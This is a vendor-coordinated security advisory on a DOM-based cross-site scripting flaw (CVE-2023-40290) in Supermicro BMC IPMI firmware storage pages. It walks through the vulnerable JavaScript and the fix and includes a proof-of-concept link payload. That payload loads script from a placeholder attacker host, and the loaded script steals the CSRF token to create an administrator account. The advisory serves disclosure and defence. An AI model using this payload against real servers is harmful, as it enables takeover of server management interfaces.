Header bannerHeader banner

[BRLY-2023-010] Cross-site scripting vulnerability in Supermicro BMC IPMI firmware in the servh_storage_create and servh_storage_add webpages using the hash property of the URL

October 3, 2023


BINARLY team has discovered a DOM-based cross-site scripting (XSS) vulnerability in servh_storage_create and servh_storage_add webpages that uses hash property of the URL, included in the web server component of Supermicro BMC IPMI firmware, allowing a possible attacker to gain access to an account with administrator privileges. This attack works on IE11 and Microsoft Edge in Internet Explorer mode.

Vulnerability Information

  • BINARLY internal vulnerability identifier: BRLY-2023-010
  • Supermicro PSIRT assigned CVE identifier: CVE-2023-40290
  • BINARLY calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
  • Supermicro PSIRT calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Supermicro firmwares with confirmed impact by Binarly team

Device Version SHA256
X11SSM-F/X11SAE-F/X11SSE-F 1.66 dbc3842a5e3918463690fa165b2b0955989c00702bc7284af5875ef08e7606b1

Potential impact

An attacker could exploit this vulnerability to create an account with administrative privileges to the web server component of BMC IPMI software. Such account provides full acess to these settings: System Information, Chassis Locator Control, FRU Reading, Sensor Readings, Event Log, Alert, LDAP, Mouse Mode, Network, SMTP, SSL, Users, Event Action, Power Control, KVM, F/W Update, Logout. It also allows exploitation of vulnerabilities that require authentication.

Vulnerability description

servh_storage_create and servh_storage_add HTML pages contain the PageInit() JavaScript function, which is executed when the webpage is loaded. This function gets the value of request hash property and uses it to construct a string that will be assigned to the content of the HTML object with id = devinfo using the innerHTML property without any sanitization.
The following code is from the servh_storage_create HTML page, for the servh_storage_add it is similar:

function PageInit() {
  var param1 = window.location.hash.split("#");
  if (param1[1].length != 0) {
    var param2 = param1[1].split(",");
    if (param2[0].length != 0 && param2[1].length != 0) {
      ctrl_idx = param2[0];
      max_api_row_size = param2[1];
      document.getElementById("devinfo").innerHTML =
        "Device" + ctrl_idx + ": Unconfigured good drive";
  } else {
    location.href = "../cgi/url_redirect.cgi?url_name=servh_storage";

As a result, arbitrary JavaScript code can be injected into the webpage, which will be executed on behalf of the authenticated user.

NOTE: the attack only works on IE11 and Microsoft Edge in Internet Explorer mode, otherwise the value of window.location.hash will be URL-encoded, which prevents code injection.

Steps for exploitation

To create an administrator account with username BRLY and password BRLYBRLY an attacker can trick an authenticated user with administrative privileges to open one of this links in a web browser:<img src=1 onerror='document.write("<script src=\"https://{ATTACKER_HOST}/payload.js\"></script>")'>,2<img src=1 onerror='document.write("<script src=\"https://{ATTACKER_HOST}/payload.js\"></script>")'>,2

Where https://{ATTACKER_HOST}/payload.js is an address of hosted malicious JS:

var ajaxRequest = new XMLHttpRequest();
var csrfRegex = /CSRF_TOKEN", "([^"]*?)"/g;
ajaxRequest.open("GET", "/cgi/url_redirect.cgi?url_name=topmenu", false);
var csrfMatch = csrfRegex.exec(ajaxRequest.responseText);
var csrf = csrfMatch[1];

var params =
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", "/cgi/op.cgi", true);
ajaxRequest.setRequestHeader("Csrf_token", csrf);

In this attack, the onerror event is used to execute JavaScript code when the browser tries to download a non-existenting image. The JS code adds the additional <script> element to the page, which loads malicious payload from the attacker controlled server. When executed, the payload first obtains the user's CSRF token and then uses it to make a POST request in order to create a user with administrative privileges and credentials defined by the attacker.

How to fix it

Ideally, user controlled parameters should not be assigned to HTML elements. If it is not possible in such case, the ctrl_idx parameter must be checked against a whitelist of allowed values.

Disclosure timeline

This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Disclosure Activity Date (YYYY-mm-dd)
Supermicro PSIRT is notified 2023-06-28
Supermicro PSIRT confirmed reported issue 2023-06-29
Supermicro PSIRT assigned CVE number 2023-08-17
Supermicro PSIRT provide patch release 2023-10-03
BINARLY public disclosure date 2023-10-03